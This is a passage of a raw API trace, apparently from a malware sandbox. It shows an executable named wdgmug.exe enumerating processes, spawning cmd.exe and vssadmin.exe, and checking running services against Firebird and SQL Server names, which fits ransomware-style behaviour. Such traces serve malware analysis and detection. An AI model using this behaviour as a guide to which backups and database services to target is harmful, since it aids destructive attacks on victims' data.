th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.208] lstrlenW (lpString="svchost.exe") returned 11 [0312.209] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0312.209] lstrlenW (lpString="dwm.exe") returned 7 [0312.209] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.210] lstrlenW (lpString="svchost.exe") returned 11 [0312.210] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.211] lstrlenW (lpString="svchost.exe") returned 11 [0312.212] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.212] lstrlenW (lpString="svchost.exe") returned 11 [0312.212] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.213] lstrlenW (lpString="svchost.exe") returned 11 [0312.213] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.214] lstrlenW (lpString="svchost.exe") returned 11 [0312.214] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.214] lstrlenW (lpString="svchost.exe") returned 11 [0312.215] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.215] lstrlenW (lpString="svchost.exe") returned 11 [0312.215] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.216] lstrlenW (lpString="svchost.exe") returned 11 [0312.216] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.216] lstrlenW (lpString="svchost.exe") returned 11 [0312.217] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.217] lstrlenW (lpString="svchost.exe") returned 11 [0312.217] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0312.218] lstrlenW (lpString="spoolsv.exe") returned 11 [0312.218] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.218] lstrlenW (lpString="svchost.exe") returned 11 [0312.219] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0312.227] lstrlenW (lpString="audiodg.exe") returned 11 [0312.227] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0312.228] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0312.228] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0312.228] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0312.228] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0312.229] lstrlenW (lpString="Memory Compression") returned 18 [0312.229] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0312.230] lstrlenW (lpString="sihost.exe") returned 10 [0312.230] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.231] lstrlenW (lpString="svchost.exe") returned 11 [0312.231] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0312.231] lstrlenW (lpString="taskhostw.exe") returned 13 [0312.231] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0312.232] lstrlenW (lpString="explorer.exe") returned 12 [0312.232] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0312.233] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0312.233] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0312.405] lstrlenW (lpString="SearchUI.exe") returned 12 [0312.405] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0312.406] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0312.406] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0312.407] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0312.407] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0312.412] lstrlenW (lpString="wdgmug.exe") returned 10 [0312.412] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0312.413] lstrlenW (lpString="cmd.exe") returned 7 [0312.413] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0312.416] lstrlenW (lpString="conhost.exe") returned 11 [0312.416] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0312.417] lstrlenW (lpString="vssadmin.exe") returned 12 [0312.417] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 1 [0312.418] lstrlenW (lpString="consent.exe") returned 11 [0312.486] Process32NextW (in: hSnapshot=0x54c, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="consent.exe")) returned 0 [0312.486] CloseHandle (hObject=0x54c) returned 1 [0312.487] Sleep (dwMilliseconds=0x1f4) [0312.993] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a300 [0312.993] EnumServicesStatusExW (in: hSCManager=0x401a300, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0312.994] GetLastError () returned 0xea [0312.994] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c30) returned 0x4150d60 [0312.994] EnumServicesStatusExW (in: hSCManager=0x401a300, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4150d60, cbBufSize=0x1c30, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4150d60, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0312.996] CloseServiceHandle (hSCObject=0x401a300) returned 1 [0312.996] lstrlenW (lpString="Appinfo") returned 7 [0312.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0312.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0312.996] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0312.996] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0312.996] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0312.996] lstrlenW (lpString="AppXSvc") returned 7 [0312.996] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0312.996] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0312.996] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0312.997] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0312.997] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0312.997] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0312.997] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0312.997] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0312.997] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0312.997] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0312.997] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0312.997] lstrlenW (lpString="Audiosrv") returned 8 [0312.997] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0312.997] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0312.997] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0312.997] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0312.997] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0312.997] lstrlenW (lpString="BFE") returned 3 [0312.997] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0312.997] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0312.997] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0312.997] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0312.997] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0312.997] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0312.997] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0312.997] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0312.997] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0312.998] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0312.998] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0312.998] lstrlenW (lpString="CDPSvc") returned 6 [0312.998] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0312.998] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0312.998] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0312.998] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0312.998] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0312.998] lstrlenW (lpString="ClickToRunSvc") returned 13 [0312.998] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0312.998] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0312.998] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0312.998] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0312.998] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0312.998] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0312.998] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0312.998] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0312.998] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0312.998] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0312.998] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0312.999] lstrlenW (lpString="CryptSvc") returned 8 [0312.999] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0312.999] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0312.999] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0312.999] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0312.999] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0312.999] lstrlenW (lpString="DcomLaunch") returned 10 [0312.999] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0312.999] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0312.999] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0312.999] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0312.999] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0312.999] lstrlenW (lpString="DeviceAssociationService") returned 24 [0312.999] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0312.999] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0312.999] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0312.999] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0312.999] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0312.999] lstrlenW (lpString="Dhcp") returned 4 [0312.999] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0312.999] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0312.999] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0313.000] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0313.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0313.000] lstrlenW (lpString="Dnscache") returned 8 [0313.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0313.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0313.000] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0313.000] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0313.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0313.000] lstrlenW (lpString="DPS") returned 3 [0313.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0313.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0313.000] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0313.000] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0313.000] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0313.000] lstrlenW (lpString="DusmSvc") returned 7 [0313.000] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0313.000] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0313.000] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0313.000] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0313.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0313.001] lstrlenW (lpString="EventLog") returned 8 [0313.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0313.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0313.001] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0313.001] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0313.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0313.001] lstrlenW (lpString="EventSystem") returned 11 [0313.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0313.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0313.001] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0313.001] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0313.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0313.001] lstrlenW (lpString="FontCache") returned 9 [0313.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0313.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0313.001] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0313.001] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0313.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0313.001] lstrlenW (lpString="gpsvc") returned 5 [0313.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0313.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0313.002] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0313.002] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0313.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0313.002] lstrlenW (lpString="iphlpsvc") returned 8 [0313.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0313.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0313.002] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0313.002] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0313.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0313.002] lstrlenW (lpString="KeyIso") returned 6 [0313.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0313.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0313.002] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0313.002] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0313.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0313.002] lstrlenW (lpString="LanmanServer") returned 12 [0313.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0313.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0313.002] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0313.002] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0313.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0313.003] lstrlenW (lpString="LanmanWorkstation") returned 17 [0313.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0313.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0313.003] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0313.003] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0313.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0313.003] lstrlenW (lpString="lfsvc") returned 5 [0313.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0313.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0313.003] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0313.003] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0313.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0313.003] lstrlenW (lpString="lmhosts") returned 7 [0313.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0313.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0313.003] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0313.004] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0313.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0313.004] lstrlenW (lpString="LSM") returned 3 [0313.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0313.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0313.004] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0313.004] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0313.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0313.004] lstrlenW (lpString="MpsSvc") returned 6 [0313.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0313.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0313.004] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0313.004] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0313.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0313.004] lstrlenW (lpString="NcbService") returned 10 [0313.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0313.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0313.004] lstrcmpiW 